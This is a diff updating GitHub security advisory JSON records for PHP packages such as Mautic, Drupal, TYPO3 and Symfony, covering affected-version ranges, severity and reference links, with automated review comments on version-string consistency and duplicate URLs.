+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-37626.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-37626.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/contao/contao"
diff --git a/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json b/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json
index b7050a6080811..f9b8811e59553 100644
--- a/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json
+++ b/advisories/github-reviewed/2021/09/GHSA-32hw-3pvh-vcvc/GHSA-32hw-3pvh-vcvc.json
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "mautic/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0-alpha1"
+ },
+ {
+ "fixed": "4.0.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -48,6 +67,10 @@
 "type": "WEB",
 "url": "https://github.com/mautic/mautic/commit/942cb6992df619fdf1c181bfad9e25d5d4178b6f"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27909.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/mautic/mautic"
diff --git a/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json b/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json
index ba74ba03dcb6c..291ff9e111720 100644
--- a/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json
+++ b/advisories/github-reviewed/2021/09/GHSA-4574-qv3w-fcmg/GHSA-4574-qv3w-fcmg.json
@@ -25,10 +25,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "4.0.0"
+ "introduced": "0"
 },
 {
- "fixed": "4.1.22"
+ "fixed": "3.1.3"
 }
 ]
 }
@@ -44,10 +44,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "4.0.0"
 },
 {
- "fixed": "3.1.3"
+ "fixed": "4.1.22"
 }
 ]
 }
@@ -83,10 +83,18 @@
 "type": "WEB",
 "url": "https://github.com/Codeception/Codeception/blob/4.1/ext/RunProcess.php#L52"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/codeception/codeception/CVE-2021-23420.yaml"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/JinYiTong/poc"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://github.com/advisories/GHSA-4574-qv3w-fcmg"
+ },
 {
 "type": "WEB",
 "url": "https://snyk.io/vuln/SNYK-PHP-CODECEPTIONCODECEPTION-1324585"
diff --git a/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json b/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json
index fd5518d616edb..e053db75a632a 100644
--- a/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json
+++ b/advisories/github-reviewed/2021/09/GHSA-72hm-fx78-xwhc/GHSA-72hm-fx78-xwhc.json
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "mautic/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0-alpha1"
+ },
+ {
+ "fixed": "4.0.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -44,6 +63,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27911"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27911.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/mautic/mautic"
diff --git a/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json b/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json
index a86d67029c7b4..d4883a2c1fad5 100644
--- a/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json
+++ b/advisories/github-reviewed/2021/09/GHSA-7322-jrq4-x5hf/GHSA-7322-jrq4-x5hf.json
@@ -74,6 +74,10 @@
 }
 ],
 "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/lcobucci/jwt/security/advisories/GHSA-7322-jrq4-x5hf"
+ },
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41106"
@@ -86,6 +90,10 @@
 "type": "WEB",
 "url": "https://github.com/lcobucci/jwt/commit/c45bb8b961a8e742d8f6b88ef5ff1bd5cca5d01c"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/lcobucci/jwt/CVE-2021-41106.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/lcobucci/jwt"
diff --git a/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json b/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json
index 4b50c90b17e98..63298792c9312 100644
--- a/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json
+++ b/advisories/github-reviewed/2021/09/GHSA-86pv-95mj-7w5f/GHSA-86pv-95mj-7w5f.json
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "mautic/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0-alpha1"
+ },
+ {
+ "fixed": "4.0.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -48,6 +67,10 @@
 "type": "WEB",
 "url": "https://github.com/mautic/mautic/commit/e6a405975342f3cf86aa71927618d31d25135fa3"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27910.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/mautic/mautic"
diff --git a/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json b/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json
index 5c4087846a0b4..2ee647c5b241a 100644
--- a/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json
+++ b/advisories/github-reviewed/2021/09/GHSA-rh5w-82wh-jhr8/GHSA-rh5w-82wh-jhr8.json
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "mautic/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0-alpha1"
+ },
+ {
+ "fixed": "4.0.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -44,6 +63,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27912"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27912.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/mautic/mautic"
diff --git a/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json b/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json
index 70dc2027ec2e8..8561e7c3bd1a7 100644
--- a/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json
+++ b/advisories/github-reviewed/2021/09/GHSA-x7g2-wrrp-r6h3/GHSA-x7g2-wrrp-r6h3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x7g2-wrrp-r6h3",
- "modified": "2023-05-01T22:18:02Z",
+ "modified": "2024-02-05T15:50:17Z",
 "published": "2021-09-01T18:41:06Z",
 "aliases": [
 "CVE-2021-27913"
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "mautic/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0-alpha1"
+ },
+ {
+ "fixed": "4.0.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -48,6 +67,10 @@
 "type": "WEB",
 "url": "https://github.com/mautic/mautic/commit/d1cad766a2de74e6c6b89d6d78c2a5f2e36ba91c"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27913.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/mautic/mautic"
diff --git a/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json b/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json
index 8a2fcea6851e2..0a32454d15ece 100644
--- a/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json
+++ b/advisories/github-reviewed/2021/09/GHSA-xv7v-rf6g-xwrc/GHSA-xv7v-rf6g-xwrc.json
@@ -52,6 +52,120 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.0.0"
+ },
+ {
+ "fixed": "7.67.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0.0"
+ },
+ {
+ "fixed": "8.6.16"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.7.0"
+ },
+ {
+ "fixed": "8.7.1"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.0.0"
+ },
+ {
+ "fixed": "7.67.0"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0.0"
+ },
+ {
+ "fixed": "8.6.16"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.7.0"
+ },
+ {
+ "fixed": "8.7.1"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -59,6 +173,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11831"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2019-11831.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2019-11831.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/phar-stream-wrapper/CVE-2019-11831.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/TYPO3/phar-stream-wrapper"
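Review bot: The drupal/core and drupal/drupal 7.x ranges use `"fixed": "7.67.0"`, while the same commit writes Drupal 7 versions with two components elsewhere (`"fixed": "7.74"`, kept as context and reused for the added drupal/drupal entry in the GHSA-68jc-v27h-vhmw hunks on L88). Composer normalises both spellings, so matching is not affected, but one convention per package keeps readers and tooling from treating `7.67.0` and `7.67` as different releases; `"fixed": "7.67"` would follow the existing records.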
@@ -127,6 +253,10 @@
 "type": "WEB",
 "url": "https://seclists.org/bugtraq/2019/May/36"
 },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/security/advisory/typo3-psa-2019-007"
+ },
 {
 "type": "WEB",
 "url": "https://typo3.org/security/advisory/typo3-psa-2019-007/"
diff --git a/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json b/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json
index 105dd357e6e30..c5d20e68448dd 100644
--- a/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json
+++ b/advisories/github-reviewed/2021/10/GHSA-657m-v5vm-f6rw/GHSA-657m-v5vm-f6rw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-657m-v5vm-f6rw",
- "modified": "2021-11-01T21:06:16Z",
+ "modified": "2024-02-05T11:18:00Z",
 "published": "2021-10-05T20:23:47Z",
 "aliases": [
 "CVE-2021-41113"
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.2.0"
+ },
+ {
+ "fixed": "11.5.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -52,6 +71,14 @@
 "type": "WEB",
 "url": "https://github.com/TYPO3/typo3/commit/fa51999203c5e5d913ecae5ea843ccb2b95fa33f"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-41113.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-41113.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/TYPO3/typo3"
@@ -59,6 +86,10 @@
 {
 "type": "WEB",
 "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-006"
+ },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-014"
 }
 ],
 "database_specific": {
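Review bot: The added `https://typo3.org/security/advisory/typo3-psa-2019-007` differs from the existing reference two lines below only by the trailing slash, so the references list now carries the same advisory twice. The same near-duplication recurs where percent-encoded Fedora list URLs (`%40`) are added next to their existing `@`-form twins in the GHSA-68jc-v27h-vhmw and GHSA-c2h3-6mxw-7mvq hunks on L89 and the GHSA-2xhg-w2g5-w95x hunk on L93. Normalising the URL once in the sync tooling, or dropping the duplicate here, would keep one entry per reference.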
@@ -66,7 +97,7 @@
 "CWE-309",
 "CWE-352"
 ],
- "severity": "MODERATE",
+ "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2021-10-05T18:48:07Z",
 "nvd_published_at": "2021-10-05T18:15:00Z"
diff --git a/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json b/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json
index 0eb332628d6bb..58e17e3b10265 100644
--- a/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json
+++ b/advisories/github-reviewed/2021/10/GHSA-68jc-v27h-vhmw/GHSA-68jc-v27h-vhmw.json
@@ -82,7 +82,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "7.0"
+ "introduced": "7.0.0"
 },
 {
 "fixed": "7.74"
@@ -90,6 +90,82 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.0.0"
+ },
+ {
+ "fixed": "7.74"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0.0"
+ },
+ {
+ "fixed": "8.8.11"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.9.0"
+ },
+ {
+ "fixed": "8.9.9"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "9.0.0"
+ },
+ {
+ "fixed": "9.0.8"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
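Review bot: `database_specific.severity` moves from `MODERATE` to `HIGH`, but no hunk in this file touches the `severity` array's CVSS_V3 score, so the label and the score are changed independently. If the existing score already maps to HIGH this is a correction; otherwise the two fields now disagree and consumers reading one or the other will rank the advisory differently. Worth confirming the unchanged score above before merging.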
@@ -97,10 +173,26 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13671"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13671.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13671.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/drupal/core"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/"
diff --git a/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json b/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json
index a66e153d8d1a8..078bf2d1c05ae 100644
--- a/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json
+++ b/advisories/github-reviewed/2021/10/GHSA-c2h3-6mxw-7mvq/GHSA-c2h3-6mxw-7mvq.json
@@ -83,6 +83,14 @@
 "type": "WEB",
 "url": "https://github.com/containerd/containerd/releases/tag/v1.5.7"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/"
@@ -91,6 +99,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-31"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2021/dsa-5002"
diff --git a/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json b/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json
index ecb3e0f59b223..424df8c472fce 100644
--- a/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json
+++ b/advisories/github-reviewed/2021/10/GHSA-frqg-7g38-6gcf/GHSA-frqg-7g38-6gcf.json
@@ -44,7 +44,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "2.0"
+ "introduced": "2.0.0-alpha1"
 },
 {
 "fixed": "2.1.9"
@@ -67,6 +67,10 @@
 "type": "WEB",
 "url": "https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2021-41116.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/composer/composer"
diff --git a/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json b/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json
index 1a2251ddf545a..fc46ced7a5eec 100644
--- a/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json
+++ b/advisories/github-reviewed/2021/10/GHSA-j66h-cc96-c32q/GHSA-j66h-cc96-c32q.json
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "1.0"
+ "introduced": "1.0.0"
 },
 {
 "fixed": "1.8.1"
@@ -40,6 +40,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36150"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/admin/CVE-2021-36150.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/silverstripe/silverstripe-framework"
diff --git a/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json b/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json
index e930a43134588..097ecdcc01330 100644
--- a/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json
+++ b/advisories/github-reviewed/2021/10/GHSA-m2jh-fxw4-gphm/GHSA-m2jh-fxw4-gphm.json
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.0.0"
+ },
+ {
+ "fixed": "11.5.0"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -52,6 +71,14 @@
 "type": "WEB",
 "url": "https://github.com/TYPO3/typo3/commit/5cbff85506cebe343e5ae59228977547cf8e3cf4"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-41114.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-41114.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/TYPO3/typo3"
diff --git a/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json b/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json
index 8aa546e707407..e4f9cb4777e90 100644
--- a/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json
+++ b/advisories/github-reviewed/2021/10/GHSA-r7rh-g777-g5gx/GHSA-r7rh-g777-g5gx.json
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "3.0.0"
 },
 {
 "fixed": "3.5.2"
@@ -44,6 +44,10 @@
 "type": "WEB",
 "url": "https://github.com/silverstripe/silverstripe-graphql/pull/407/commits/16961459f681f7b32145296189dfdbcc7715e6ed"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2021-28661.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/silverstripe/silverstripe-graphql"
diff --git a/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json b/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json
index 14aa65542108a..dd0dfe85078da 100644
--- a/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json
+++ b/advisories/github-reviewed/2021/11/GHSA-2xhg-w2g5-w95x/GHSA-2xhg-w2g5-w95x.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2xhg-w2g5-w95x",
- "modified": "2021-12-06T21:36:47Z",
+ "modified": "2024-02-05T11:14:05Z",
 "published": "2021-11-24T21:01:23Z",
 "aliases": [
 "CVE-2021-41270"
@@ -52,6 +52,44 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.1.0"
+ },
+ {
+ "fixed": "4.4.35"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "5.0.0"
+ },
+ {
+ "fixed": "5.3.12"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -71,6 +109,14 @@
 "type": "WEB",
 "url": "https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/serializer/CVE-2021-41270.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-41270.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/symfony/symfony"
@@ -79,6 +125,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v5.3.12" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3BPT4SF6SIXFMZARDWED5T32J7JEH3EP/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QSREFD2TJT5LWKM6S4MD3W26NQQ5WJUP/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3BPT4SF6SIXFMZARDWED5T32J7JEH3EP/" @@ -86,6 +140,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QSREFD2TJT5LWKM6S4MD3W26NQQ5WJUP/" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-41270" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json b/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json index e4728715d69cd..aded9ce244f99 100644 --- a/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json +++ b/advisories/github-reviewed/2021/11/GHSA-86fh-j58m-7pf5/GHSA-86fh-j58m-7pf5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-86fh-j58m-7pf5", - "modified": "2021-11-22T19:04:02Z", + "modified": "2024-01-31T15:13:11Z", "published": "2021-11-23T17:57:14Z", "aliases": [ "CVE-2021-36372" @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36372" }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/ozone" + }, { "type": "WEB", "url": "https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C5029c1ac-4685-8492-e3cb-ab48c5c370cf%40apache.org%3E" 
